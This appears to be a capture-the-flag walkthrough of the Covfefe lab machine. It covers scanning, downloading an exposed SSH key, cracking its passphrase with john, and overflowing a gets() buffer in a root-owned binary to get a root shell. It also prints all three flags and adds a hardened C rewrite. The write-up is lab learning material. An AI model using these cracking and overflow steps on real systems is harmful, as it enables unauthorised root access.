Covfefe Walkthrough

Mr. Robot

In the beginning, I’d like to mention that this post is going to contain flags and steps to solve this box. I don’t want to ruin other people’s fun, I advise you to think harder and continue reading only if you’re truly out of ideas.

This box contains 3 flags, so let’s get them!

Scanning

Getting IP address from the machine.

root@kali:~# netdiscover -r 192.168.43.0/24

Then, moving on to scanning the machine:

root@kali:~# nmap -A -O -p- 192.168.43.186
--- snip ---
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 d0:6a:10:e0:fb:63:22:be:09:96:0b:71:6a:60:ad:1a (RSA)
| 256 ac:2c:11:1e:e2:d6:26:ea:58:c4:3e:2d:3e:1e:dd:96 (ECDSA)
|_ 256 13:b3:db:c5:af:62:c2:b1:60:7d:2f:48:ef:c3:13:fc (EdDSA)
80/tcp open http nginx 1.10.3
|_http-server-header: nginx/1.10.3
|_http-title: Welcome to nginx!
31337/tcp open http Werkzeug httpd 0.11.15 (Python 3.5.3)
| http-robots.txt: 3 disallowed entries
|_/.bashrc /.profile /taxes
|_http-title: 404 Not Found
--- snip ---

I considered port 80 a dead end: no directories, literally nothing in there.

Nikto showed me nothing useful, so I went to check out those disallowed entries on port 31337 and I found the first flag under the taxes directory:

Good job! Here is a flag: flag1{make_america_great_again}

I just wanted to be sure there is nothing left, so I ran dirb on port 31337 and a hidden .ssh directory turned up.

Gaining access

I downloaded everything from the .ssh directory, and the key files revealed that our user is “simon”. As the private key required a passphrase, I had to crack it. ssh2john is an excellent tool designed for exactly this task and is really easy to use.

root@kali:~# ssh2john id_rsa > result

Only the cracking with john was left:

root@kali:~# john result --format=ssh
Created directory: /home/username/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
starwars (id_rsa)
1g 0:00:00:03 DONE 2/3 (2018-01-27 23:11) 0.2816g/s 3532p/s 3532c/s 3532C/s starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Using this information and the private key, I successfully logged in via SSH.

root@kali:~/Downloads# chmod 600 id_rsa
root@kali:~/Downloads# ssh -i id_rsa simon@192.168.43.86
Enter passphrase for key 'id_rsa':
Linux covfefe 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
simon@covfefe:~$

I noticed in the .bash_history file that a read_message command was used. I executed the program and provided my name “Simon”.

simon@covfefe:~$ read_message
What is your name?
Simon
Hello Simon! Here is your message:
Hi Simon, I hope you like our private messaging system. I'm really happy with how it worked out! If you're interested in how it works, I've left a copy of the source code in my home directory. - Charlie Root

Very informative message. I immediately headed to the root directory to check this source code out, which gave me:

simon@covfefe:/root$ cat read_message.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* needed for strncmp(); missing in the original listing */
#include <unistd.h>

// You're getting close! Here's another flag:
// flag2{use_the_source_luke}

int main(int argc, char *argv[]) {
    char program[] = "/usr/local/sbin/message";
    char buf[20];
    char authorized[] = "Simon";

    printf("What is your name?\n");
    gets(buf);   /* unbounded read: this is the intended bug on the box */

    // Only compare first five chars to save precious cycles:
    if (!strncmp(authorized, buf, 5)) {
        printf("Hello %s! Here is your message:\n\n", buf);
        // This is safe as the user can't mess with the binary location:
        execve(program, NULL, NULL);
    } else {
        printf("Sorry %s, you're not %s! The Internet Police have been informed of this violation.\n", buf, authorized);
        exit(EXIT_FAILURE);
    }
}

I’ve got my second flag:

flag2{use_the_source_luke}

Now, it was time to exploit the program. As you can see, the check only compares the first 5 characters, and gets() reads into a buffer of only 20 characters with no length limit, so anything past the 20th character overwrites the adjacent stack data, including the program path that execve runs. Since the binary runs as root, I was able to execute a system shell as root by padding the name to 20 characters and then providing the full path to the shell.

simon@covfefe:/root$ read_message 
What is your name?
Simonaaaaaaaaaaaaaaa/bin/sh
Hello Simonaaaaaaaaaaaaaaa/bin/sh! Here is your message:
# whoami
root
# cat flag.txt
You did it! Congratulations, here's the final flag:
flag3{das_bof_meister}
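
To show what went wrong in read_message.c and what a fixed version looks like, here is an added example (my own code, not the box's or the author's). It keeps the weak prefix check from the page beside a full-string check, and replaces gets() with a bounded reader that flags any line longer than the 20-byte buffer instead of letting it spill onto the stack; the fmemopen() input is a constructed sample, not captured from the box.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

#define NAME_LEN 20               /* same size as buf[20] in read_message.c */
static const char AUTHORIZED[] = "Simon";

/* The check as written on the box: only the first five bytes are compared,
 * so any name that merely begins with "Simon" is accepted. */
int weak_check(const char *name) {
    return strncmp(AUTHORIZED, name, 5) == 0;
}

/* Hardened check: the whole string must match, not just a prefix. */
int strict_check(const char *name) {
    return strcmp(AUTHORIZED, name) == 0;
}

/* Bounded replacement for gets(): reads at most n-1 bytes into buf, strips
 * the newline, and reports whether the line was longer than the buffer.
 * Returns -1 on EOF/error, 0 when the line fit, 1 when it was truncated. */
int read_name(char *buf, size_t n, FILE *in) {
    if (!fgets(buf, (int)n, in))
        return -1;
    char *nl = strchr(buf, '\n');
    if (nl) {
        *nl = '\0';
        return 0;
    }
    /* No newline within n-1 bytes: the line was too long; drain the rest
     * so it cannot be read as the next "input" and report the overflow. */
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n')
        ;
    return 1;
}

/* Hardened flow over one in-memory input line: returns 1 only when the name
 * both fit in the 20-byte buffer and matched "Simon" exactly. */
int hardened_read_message(const char *line) {
    char buf[NAME_LEN];
    FILE *in = fmemopen((void *)line, strlen(line), "r");
    if (!in)
        return 0;
    int rc = read_name(buf, sizeof buf, in);
    fclose(in);
    return rc == 0 && strict_check(buf);
}
```

With this version the padded name from the walkthrough is rejected twice over: it is cut at 19 bytes before it can reach any neighbouring variable, and the truncated remainder no longer equals "Simon".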

The box was finally rooted and the last flag was:

flag3{das_bof_meister}

Before you go…

Thank you for taking the time to read my walkthrough. If you found it helpful, please hit the 👏 button 👏 (up to 50x) and share it to help others with similar interests find it! Feedback is always welcome! 🙏